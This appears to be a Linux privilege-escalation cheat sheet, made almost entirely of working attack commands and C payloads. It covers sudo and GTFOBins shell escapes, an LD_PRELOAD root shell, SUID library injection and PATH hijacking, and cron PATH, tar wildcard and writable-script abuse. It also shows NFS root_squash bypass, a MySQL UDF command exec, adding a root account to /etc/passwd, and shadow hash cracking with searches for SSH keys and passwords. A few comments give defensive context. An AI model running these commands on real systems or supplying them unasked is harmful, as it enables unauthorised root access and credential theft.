Linux
uname -a
cat /etc/issue
cat /etc/*-release
les.sh
sudo -l
grep -Ri 'db' /var/www --color=auto
grep -Ri 'sql' /var/www --color=auto
grep -Ri '$db_name' /var/www --color=auto
ls -lsa /tmp/
ls -lsa /dev/shm
ls -lsa /opt/
ls -lsa /
ls -ls /etc — look for entries owned by anything other than root:root, root:fuse, root:shadow or root:dip
ls -lsa /etc | grep -i '.secret'
ls -lsaR /var/mail
ls -lsaR /var/spool/mail
ls -lsaR /home
mount
lsblk
cat /etc/fstab
List loaded kernel modules (drivers)
lsmod
Get libata driver information and version:
modinfo libata
Reference https://gtfobins.github.io/
sudo find /bin -name nano -exec /bin/sh \;
sudo awk 'BEGIN {system("/bin/sh")}'
echo "os.execute('/bin/sh')" > shell.nse && sudo nmap --script=shell.nse
sudo vim -c '!sh'
Create a file named malicious.c:
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
void _init() {
// With -nostartfiles (see the gcc line below) the library's own _init is the
// initialiser the dynamic loader calls, so this body runs inside the process
// that sudo starts with LD_PRELOAD set. It only works when the sudoers policy
// preserves LD_PRELOAD (env_keep) instead of resetting the environment —
// defenders should check `sudo -l` output for that and remove it.
unsetenv("LD_PRELOAD");
setgid(0);
setuid(0);
system("/bin/bash");
}
Compile the shared object, then load it:
gcc -fPIC -shared -o /tmp/malicious.so malicious.c -nostartfiles
sudo LD_PRELOAD=/tmp/malicious.so apache2
find / -type f -perm -04000 -ls 2>/dev/null
Run strace on the SUID binary to find the missing shared object (here "foundso.so"):
strace /usr/local/bin/SuidFromPreviousOutput 2>&1 | grep -i -E "open|access|no such file"
mkdir /home/user/.config
cd /home/user/.config
Create foundso.c:
#include <stdio.h>
#include <stdlib.h>
// The constructor attribute makes inject() run as soon as the library is
// mapped — i.e. when the SUID binary loads a shared object from a
// user-writable directory (/home/user/.config above). The weakness is on the
// binary side: a privileged program must not search a writable path for its
// libraries; the strace grep above is also how a defender confirms which
// library it is trying to load.
static void inject() __attribute__((constructor));
void inject() {
system("cp /bin/bash /tmp/bash && chmod +s /tmp/bash && /tmp/bash -p");
}
gcc -shared -o /home/user/.config/foundso.so -fPIC /home/user/.config/foundso.c
/usr/local/bin/somesuid
sudo apache2 -f /etc/shadow
Reference https://gtfobins.github.io/ and search for anything not listed there.
find / -perm /4000 2> /dev/null
Test whether /etc/passwd or /etc/shadow is readable or writable:
ls -la /etc/passwd /etc/shadow
unshadow passwd shadow > unshadowed.txt
hashcat -m 1800 unshadowed.txt rockyou.txt -O
openssl passwd thescriptkid
echo 'thescriptkid:$1$ZEx4UyBv$/2BpqiGuy7vuNC7X9SsTO0:0:0:thescriptkid:/home/thescriptkid:/bin/bash' >> /etc/passwd
su thescriptkid
find / -iname "*.ovpn" 2> /dev/null
find / -iname "config" 2> /dev/null | grep -i "irssi"
cat filename | grep -i passw
cat /home/*/.bash_history | grep -i passw
find / -name id_rsa 2> /dev/null
chmod 400 id_rsa
ssh -i id_rsa someuser@$ip
Symlinks
Nginx below 1.6.2-5+deb8u3 logrotate Local Privilege Escalation
find / -type f -perm -04000 -ls 2>/dev/null
strings /usr/local/bin/onfoundsuid
C functions such as setresgid, setresuid, and system are of interest and should be investigated. Relative-path commands such as "service apache2 start" can be abused.
echo 'int main() { setgid(0); setuid(0); system("/bin/bash"); return 0; }' > /tmp/service.c
gcc /tmp/service.c -o /tmp/service
export PATH=/tmp:$PATH
/usr/local/bin/onfoundsuid
find / -type f -perm -04000 -ls 2>/dev/null
strings /usr/local/bin/onfoundsuid
C functions such as setresgid, setresuid, and system are of interest and should be investigated. Absolute- or relative-path commands such as "service" can be abused by defining shell functions of the same name in the current session.
Method 1
function /usr/sbin/onfoundsuid() { cp /bin/bash /tmp && chmod +s /tmp/bash && /tmp/bash -p; }
export -f /usr/sbin/service
/usr/local/bin/onfoundsuid
Method 2
env -i SHELLOPTS=xtrace PS4='$(cp /bin/bash /tmp && chown root.root /tmp/bash &&
chmod +s /tmp/bash)' /bin/sh -c '/usr/local/bin/onfoundsuid; set +x; /tmp/bash -p'
getcap -r / 2>/dev/null
/usr/bin/python2.6 -c 'import os; os.setuid(0); os.system("/bin/bash")'
cat /etc/crontab
ls /etc/cron.d
cat /var/spool/cron/crontabs/root
This abuses a misconfigured PATH in "/etc/crontab". If the user has write permission on a directory that is in that PATH, create a file with the same name as the cron job command and put the malicious contents in it.
echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /writeable/directory/somefile
chmod +x /writeable/directory/somefile
/tmp/bash -p
cat /etc/crontab
Exploitable if a cron job script runs tar with a wildcard (*). Example: tar czf /tmp/backup.tar.gz *
echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /home/user/runme.sh
/home/user/--checkpoint=1
touch /home/user/--checkpoint-action=exec=sh\ runme.sh
Wait for execution
/tmp/bash -p
cat /etc/crontab
Exploitable if the script is writable by the current user:
echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' >> /path/to/writable/writablescript
/tmp/bash -p
Victim Machine
cat /etc/exports
Kali Machine
showmount -e ip
mount -o rw,vers=2 ip:/tmp /tmp/1
echo 'int main() { setgid(0); setuid(0); system("/bin/bash"); return 0; }' > /tmp/1/thescriptkid.c
gcc /tmp/1/x.c -o /tmp/1/thescriptkid
chmod +s /tmp/1/thescriptkid
Victim Machine
/tmp/thescriptkid
Prerequisites: a valid database
show databases;
CREATE FUNCTION sys_eval RETURNS INT SONAME 'lib_mysqludf_sys.so';
select sys_eval("cp /bin/bash /var/tmp/bash ; chmod u+s /var/tmp/bash");
/var/tmp/bash -p
Try the passwords found in PHP config files.